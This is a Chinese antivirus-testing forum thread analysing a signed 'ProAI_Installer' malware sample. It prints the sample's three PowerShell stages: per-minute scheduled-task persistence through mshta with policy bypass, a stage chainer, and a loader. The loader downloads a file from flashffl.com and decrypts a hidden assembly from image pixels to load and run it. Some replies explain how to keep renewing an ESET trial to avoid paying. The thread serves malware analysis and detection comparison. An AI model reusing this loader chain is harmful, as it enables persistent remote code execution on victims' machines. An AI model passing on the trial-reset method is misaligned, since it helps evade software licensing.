带数字签名的"ProAI_Installer"

QVM360

脚本1

1. # 获取当前脚本名并去掉后缀
   
2. $scriptName = $MyInvocation.MyCommand.Name -replace ".ps1",""
   
3. 
   
4. # 替换路径中的 1.ps1 为 2.ps1
   
5. $newScriptPath = $PSCommandPath -replace "1.ps1","2.ps1"
   
6. 
   
7. # 替换路径中的 1.ps1 为 1.txt
   
8. $txtFilePath = $PSCommandPath -replace "1.ps1","1.txt"
   
9. 
   
10. try {
    
11.     # 获取当前脚本对应的计划任务
    
12.     $existingTask = Get-ScheduledTask | Where-Object {$_.TaskName -like $scriptName}
    
13. 
    
14.     # 创建新的计划任务触发器，每分钟触发一次
    
15.     $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1)
    
16. 
    
17.     # 创建计划任务动作，执行 mshta 以启动 powershell
    
18.     $action = New-ScheduledTaskAction -Execute "mshta" -Argument "vbscript:Execute(""CreateObject(""""WScript.Shell"""").Run """"powershell -ep bypass -File """"""""$newScriptPath """""""""""" ,0:close"")"
    
19. 
    
20.     # 检查当前用户是否为管理员
    
21.     $isAdmin = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544");
    
22. 
    
23.     if (!$existingTask) {
    
24.         # 如果计划任务不存在，则根据权限注册新任务
    
25.         if ($isAdmin -eq 'True') {
    
26.             Register-ScheduledTask -TaskName $scriptName -Trigger $trigger -Action $action -RunLevel Highest
    
27.         } else {
    
28.             Register-ScheduledTask -TaskName $scriptName -Trigger $trigger -Action $action
    
29.         }
    
30.     } else {
    
31.         # 如果计划任务已存在，则先注销再重新注册任务，并创建 .txt 文件
    
32.         if ($isAdmin -eq 'True') {
    
33.             Unregister-ScheduledTask -TaskName $scriptName -Confirm:$False
    
34.             Register-ScheduledTask -TaskName $scriptName -Trigger $trigger -Action $action -RunLevel Highest
    
35.             New-Item -Path "$txtFilePath" -ItemType File
    
36.         }
    
37.     }
    
38. } catch {}
    

复制代码

脚本2

1. # 获取当前脚本名称并去掉 .ps1 后缀
   
2. $scriptName = $MyInvocation.MyCommand.Name -replace ".ps1",""
   
3. 
   
4. # 标志是否已经创建了全局事件
   
5. $eventAlreadyExists = $false
   
6. 
   
7. # 创建一个全局事件等待句柄，命名为脚本名称
   
8. $globalEvent = New-Object Threading.EventWaitHandle $true, ([Threading.EventResetMode]::ManualReset), "Global\$scriptName", ([ref] $eventAlreadyExists)
   
9. 
   
10. # 如果事件已经存在，退出程序
    
11. if (-not $eventAlreadyExists) {
    
12.     Exit
    
13. } else {
    
14.     # 获取当前脚本所在目录
    
15.     $scriptRoot = $PSScriptRoot
    
16. 
    
17.     # 替换当前脚本名中的 "2.ps1" 为 "3.ps1"
    
18.     $nextScriptName = $MyInvocation.MyCommand.Name -replace "2.ps1", "3.ps1"
    
19. 
    
20.     # 构建下一个脚本的完整路径
    
21.     $nextScriptPath = $scriptRoot + "" + $nextScriptName
    
22. 
    
23.     # 执行下一个脚本
    
24.     $nextScript = & $nextScriptPath
    
25. 
    
26.     # 调用下一个脚本的入口点方法
    
27.     $nextScript.EntryPoint.Invoke($null, $null)
    
28. }
    

复制代码

脚本3

1. # 引入必要的程序集
   
2. Add-Type -AssemblyName System.Drawing
   
3. Add-Type -AssemblyName System
   
4. 
   
5. # 函数：将图像转换为十六进制字符串
   
6. Function ConvertImageToHex {
   
7.     [CmdletBinding()]
   
8.     param(
   
9.         [Parameter(Mandatory=$true)] [String]$imagePath,  # 图片文件路径
   
10.         [Parameter(Mandatory=$true)] [String]$hexSuffix   # 要匹配的十六进制后缀
    
11.     )
    
12. 
    
13.     # 加载图片
    
14.     $bitmap = [System.Drawing.Bitmap]::FromFile((Resolve-Path $imagePath).ProviderPath)
    
15.     $hexStringBuilder = [System.Text.StringBuilder]::new()
    
16. 
    
17.     # 遍历图片的每个像素
    
18.     for ($y = 0; $y -le $bitmap.Height - 1; $y++) {
    
19.         for ($x = 0; $x -le $bitmap.Width - 1; $x++) {
    
20.             $pixelColor = $bitmap.GetPixel($x, $y)
    
21.             $hexColor = [System.Drawing.ColorTranslator]::ToHtml($pixelColor)
    
22.             $hexColor = $hexColor.replace("#000000", "")  # 去掉黑色的像素
    
23.             [void]$hexStringBuilder.Append($hexColor.replace("#", ""))
    
24.         }
    
25.     }
    
26. 
    
27.     $hexString = $hexStringBuilder.ToString()
    
28.     $hexString = $hexString -replace "`n", ", " -replace "`r", ", "
    
29. 
    
30.     # 检查十六进制后缀是否匹配，不匹配则去掉最后的字符
    
31.     for ($i = 0; $i -le 10; $i++) {
    
32.         if ($hexString.Substring($hexString.Length - 6) -ne $hexSuffix) {
    
33.             $hexString = $hexString.Substring(0, $hexString.Length - 1)
    
34.         } else {
    
35.             break
    
36.         }
    
37.     }
    
38. 
    
39.     return $hexString
    
40. }
    
41. 
    
42. # 函数：解密并加载程序集
    
43. Function DecryptAndLoadAssembly {
    
44.     [CmdletBinding()]
    
45.     param(
    
46.         [Parameter(Mandatory=$true)] [String]$filePath,   # 输入文件路径
    
47.         [Parameter(Mandatory=$true)] [String]$hexSuffix   # 要匹配的十六进制后缀
    
48.     )
    
49. 
    
50.     # 调用 ConvertImageToHex 函数，获取图像的十六进制字符串
    
51.     $hexString = ConvertImageToHex $filePath $hexSuffix
    
52.     [byte[]]$byteArray = New-Object -TypeName byte[] -ArgumentList ($hexString.Length / 2)
    
53. 
    
54.     # 将十六进制字符串转换为字节数组
    
55.     for ($i = 0; $i -lt $hexString.Length; $i += 2) {
    
56.         $byteArray[$i / 2] = [Convert]::ToByte($hexString.Substring($i, 2), 16)
    
57.     }
    
58. 
    
59.     # 解密相关操作
    
60.     $encryptionKey = "AKJDnkjewioioew8494328"
    
61.     [byte[]]$salt = @(0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x11, 0x11, 0x12, 0x13, 0x14, 0x0e, 0x16, 0x17)
    
62.    
    
63.     [System.IO.MemoryStream] $memoryStream = New-Object System.IO.MemoryStream
    
64.     [System.Security.Cryptography.RijndaelManaged] $rijndael = New-Object System.Security.Cryptography.RijndaelManaged
    
65.     [System.Security.Cryptography.Rfc2898DeriveBytes] $keyDerivation = New-Object System.Security.Cryptography.Rfc2898DeriveBytes([system.text.encoding]::UTF8.GetString($salt, 0, $salt.Length), [system.text.encoding]::UTF8.GetBytes($encryptionKey))
    
66. 
    
67.     $rijndael.Key = $keyDerivation.GetBytes(128/8)
    
68.     $rijndael.IV = $rijndael.Key
    
69. 
    
70.     # 使用解密流进行解密
    
71.     [System.Security.Cryptography.CryptoStream] $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $rijndael.CreateDecryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write)
    
72.    
    
73.     try {
    
74.         $cryptoStream.Write($byteArray, 0, $byteArray.Length)
    
75.         $cryptoStream.FlushFinalBlock()
    
76.         $cryptoStream.Close()
    
77.     } catch [Exception] {
    
78.         return $false
    
79.     }
    
80. 
    
81.     # 将解密后的数据加载为程序集
    
82.     $decryptedAssembly = $memoryStream.ToArray()
    
83.     return [System.Reflection.Assembly]::Load($decryptedAssembly)
    
84. }
    
85. 
    
86. # 获取脚本的根目录和下载文件的路径
    
87. $scriptRoot = $PSScriptRoot
    
88. $filePath = $scriptRoot + "\AqrTRwsUTihEwxGVGKfj.txt"
    
89. $fileUrl = "https://flashffl.com/?IVevhoJJwxHMzaHyLQeA=AqrTRwsUTihEwxGVGKfj.txt"
    
90. 
    
91. # 如果文件不存在，下载文件
    
92. if (-not(Test-Path -Path $filePath)) {
    
93.     (New-Object System.Net.WebClient).DownloadFile($fileUrl, $filePath)
    
94. }
    
95. 
    
96. # 调用解密和加载程序集的函数
    
97. DecryptAndLoadAssembly $filePath "22EC2F"
    

复制代码

关键就在于这个

1. https://flashffl.com/?IVevhoJJwxHMzaHyLQeA=AqrTRwsUTihEwxGVGKfj.txt

复制代码

但实际上这是个空文件，所以这个样本是无效的

LeeHS

cs miss?

陌染淡殇

avast miss

莒县小哥

狐狸糊涂

独赢缠身 发表于 2024-9-22 20:39
eset有没有白嫖方法，或者低价

30天试用，循环清理工具清除激活信息，用十分钟邮箱申请新激活

狐狸糊涂

独赢缠身 发表于 2024-9-22 20:39
eset有没有白嫖方法，或者低价

循环激活工具

btbtg

独赢缠身

狐狸糊涂 发表于 2024-9-23 13:39
循环激活工具

谢谢

ANY.LNK

莒县小哥 发表于 2024-9-23 13:10

昨天用MDB以最高优先级提交了

ongarabazanade

实体双击以后中招了，把我小A隔离区给弄坏了存不住文件了。我本来把它用小A防火墙禁止联网了，但样本会从黑名单自己跑出来，还是偷偷联网下载另外的病毒，还隐藏还转移，杀完还自动恢复清理不掉。这个样本以及它下载的那个毒真顽固啊，我用360急救箱强力模式杀了2遍才把它干掉清理干净。进安全模式杀的，忘截图了。怕了，最近先不测毒了。等有了好电脑上了虚拟机再来测。最后说一句，这可真是个高质量的非常新的样本，难得遇到。